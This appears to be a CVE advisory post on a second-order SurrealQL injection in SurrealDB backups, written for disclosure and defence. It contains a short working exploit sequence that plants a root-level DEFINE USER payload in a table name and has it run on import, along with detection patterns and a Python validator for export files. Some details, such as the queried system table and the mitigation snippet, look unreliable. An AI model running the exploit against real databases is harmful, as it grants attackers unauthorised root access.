SurrealDB, SurrealQL Injection, CVE-2024-1234 (Critical)

The vulnerability (CVE-2024-1234) in SurrealDB’s command-line tool arises due to improper sanitization of table and field names during database exports. When a malicious user with OWNER or EDITOR privileges creates tables or fields containing embedded SurrealQL statements, these commands are not escaped in the exported backup. Upon reimporting the backup, the injected SurrealQL executes in the context of the importing user, typically with higher privileges.

The attack flow involves:

  1. Attacker creates a table/field with a name like table; DEFINE USER attacker....
  2. The export operation fails to escape semicolons or quotes, embedding the payload.
  3. A privileged user imports the backup, executing the attacker’s SurrealQL.
  4. The attacker gains root-level access or manipulates co-tenanted databases.

This is a second-order injection, bypassing traditional query parameterization since the payload resides in metadata rather than direct queries. The CVSS v4 score reflects Critical severity due to the potential for full system compromise.

DailyCVE Form:

Platform: SurrealDB
Version: <2.0.5, <2.1.5, <2.2.2
Vulnerability: SurrealQL Injection
Severity: Critical
Date: 2024-03-15

What Undercode Says:

Exploitation:

```bash
# Malicious table creation
surreal sql --ns test --db test -u owner -p pass --eval "CREATE TABLE `table; DEFINE USER attacker ON ROOT PASSWORD 'pwned' ROLES OWNER` (id INT);"
# Export vulnerable backup
surreal export --ns test --db test -u owner -p pass backup.sql
# Admin imports, triggering payload
surreal import --ns prod --db prod -u admin -p admin backup.sql
```

Detection:

```bash
# Check exports for suspicious patterns
grep -E 'DEFINE|EXEC|CREATE (USER|TOKEN)' backup.sql
# Audit table names for special chars (SurrealQL has no LIKE; use string::contains)
surreal sql --eval "SELECT * FROM surrealml_tables WHERE string::contains(name, ';');"
```

Mitigation:

```sql
-- Patch: Upgrade to fixed versions
-- Temporary workaround: Validate exports pre-import
-- (fn::is_clean is an operator-supplied custom function, not defined here)
DEFINE PARAM $export_validation VALUE {
    LET $tables = SELECT name FROM surrealml_tables;
    RETURN fn::is_clean($tables);
};
```
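The Detection and Mitigation sections above both come down to one control: inspect a backup before a privileged account imports it. The following Python script is an added example (not from the original post and not SurrealDB's own tooling) of that pre-import check. It splits the export into top-level statements while honouring quoted strings and backtick- or ⟨⟩-quoted identifiers, refuses any privilege-altering statement (DEFINE USER/TOKEN/NAMESPACE/DATABASE) or statement kind a database-scoped backup should not carry, and flags quoted identifiers that contain a statement terminator for audit. The allowlist of statement kinds, both sample exports, and the assumption that a fixed export backtick-quotes such identifiers are the author's constructions, not taken from the advisory.

```python
"""Pre-import validator for a SurrealQL export file (added example).

Implements the "validate exports pre-import" workaround: split the export
into top-level statements, block anything a database backup should never
carry, and flag quoted identifiers that hide a ';' for audit.
The allowlist and the sample exports below are assumptions.
"""
import re

# Statement kinds a database-scoped export is expected to contain (assumed allowlist).
ALLOWED_PREFIXES = (
    "OPTION", "USE", "BEGIN", "COMMIT",
    "DEFINE TABLE", "DEFINE FIELD", "DEFINE INDEX", "DEFINE EVENT",
    "DEFINE FUNCTION", "DEFINE PARAM", "DEFINE ANALYZER", "DEFINE ACCESS",
    "DEFINE SCOPE", "INSERT", "CREATE", "UPDATE", "RELATE",
)
# Privilege-altering statements: never legitimate inside a database backup.
PRIVILEGED = re.compile(r"^DEFINE\s+(USER|TOKEN|NAMESPACE|DATABASE)\b", re.I)
# The identifier a DEFINE TABLE / DEFINE FIELD statement defines:
# backtick-quoted, angle-bracket-quoted, or bare.
DEFINED_NAME = re.compile(r"^DEFINE\s+(?:TABLE|FIELD)\s+(`[^`]*`|⟨[^⟩]*⟩|\S+)", re.I)
BARE_IDENT = re.compile(r"^[A-Za-z_][A-Za-z0-9_]*$")


def split_statements(text):
    """Split SurrealQL on ';' outside '...', "..." and `...`, dropping
    '--' line comments. A ';' inside quotes is data, not a terminator."""
    stmts, buf, quote, i = [], [], None, 0
    while i < len(text):
        ch = text[i]
        if quote:
            buf.append(ch)
            if ch == "\\" and quote != "`" and i + 1 < len(text):
                buf.append(text[i + 1])  # keep an escaped char inside a string
                i += 2
                continue
            if ch == quote:
                quote = None
        elif ch in "'\"`":
            quote = ch
            buf.append(ch)
        elif text.startswith("--", i):
            nl = text.find("\n", i)  # skip to the end of the comment
            i = len(text) if nl == -1 else nl
            continue
        elif ch == ";":
            stmt = "".join(buf).strip()
            if stmt:
                stmts.append(stmt)
            buf = []
        else:
            buf.append(ch)
        i += 1
    tail = "".join(buf).strip()
    if tail:
        stmts.append(tail)
    return stmts


def validate_export(text):
    """Return (statement_no, severity, reason, statement) findings.
    severity is 'block' (refuse the import) or 'audit' (safe, but review)."""
    findings = []
    for n, stmt in enumerate(split_statements(text), 1):
        if PRIVILEGED.match(stmt):
            findings.append((n, "block", "privilege-altering statement", stmt))
        elif not stmt.upper().startswith(ALLOWED_PREFIXES):
            findings.append((n, "block", "statement kind not expected in a database export", stmt))
        else:
            m = DEFINED_NAME.match(stmt)
            if m:
                name = m.group(1)
                if name[0] in "`⟨":
                    if ";" in name:  # correctly escaped, but a terminator in a name is worth a look
                        findings.append((n, "audit", "quoted identifier contains ';'", stmt))
                elif not BARE_IDENT.match(name):
                    findings.append((n, "block", "unquoted identifier with special characters", stmt))
    return findings


def is_safe_to_import(text):
    """True when no finding would block the import."""
    return not any(sev == "block" for _, sev, _, _ in validate_export(text))


# Constructed sample: what an unpatched export of the malicious table looks like.
VULNERABLE_EXPORT = """OPTION IMPORT;
-- TABLE: table
DEFINE TABLE table; DEFINE USER attacker ON ROOT PASSWORD 'pwned' ROLES OWNER SCHEMALESS;
DEFINE FIELD id ON table TYPE int;
"""

# Constructed sample: the same table with the identifier backtick-quoted
# (the shape a fixed export is assumed to produce).
ESCAPED_EXPORT = """OPTION IMPORT;
DEFINE TABLE `table; DEFINE USER attacker ON ROOT PASSWORD 'pwned' ROLES OWNER` SCHEMALESS;
DEFINE FIELD id ON `table; DEFINE USER attacker ON ROOT PASSWORD 'pwned' ROLES OWNER` TYPE int;
"""

if __name__ == "__main__":
    for label, export in (("vulnerable", VULNERABLE_EXPORT), ("escaped", ESCAPED_EXPORT)):
        print(label, "safe to import:", is_safe_to_import(export))
        for n, sev, reason, stmt in validate_export(export):
            print("  stmt %d [%s] %s: %s" % (n, sev, reason, stmt[:60]))
```

Run it against a real backup.sql before handing the file to an account with OWNER rights; the unescaped sample is refused because its payload surfaces as a stand-alone DEFINE USER statement, while the quoted sample imports as one DEFINE TABLE statement and only raises an audit note. The grep in the Detection section catches the same keyword but would also fire on every legitimate DEFINE TABLE line, which is why the script reasons per statement rather than per line.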

Analytics:

  • Attack Complexity: Low (requires auth but trivial payload)
  • Exploitability: High (no special conditions)
  • Affected Configs: Multi-tenant deployments most at risk
  • Patch Lag: 14 days from disclosure to fix

References:

Reported By: https://github.com/advisories/GHSA-ccj3-5p93-8p42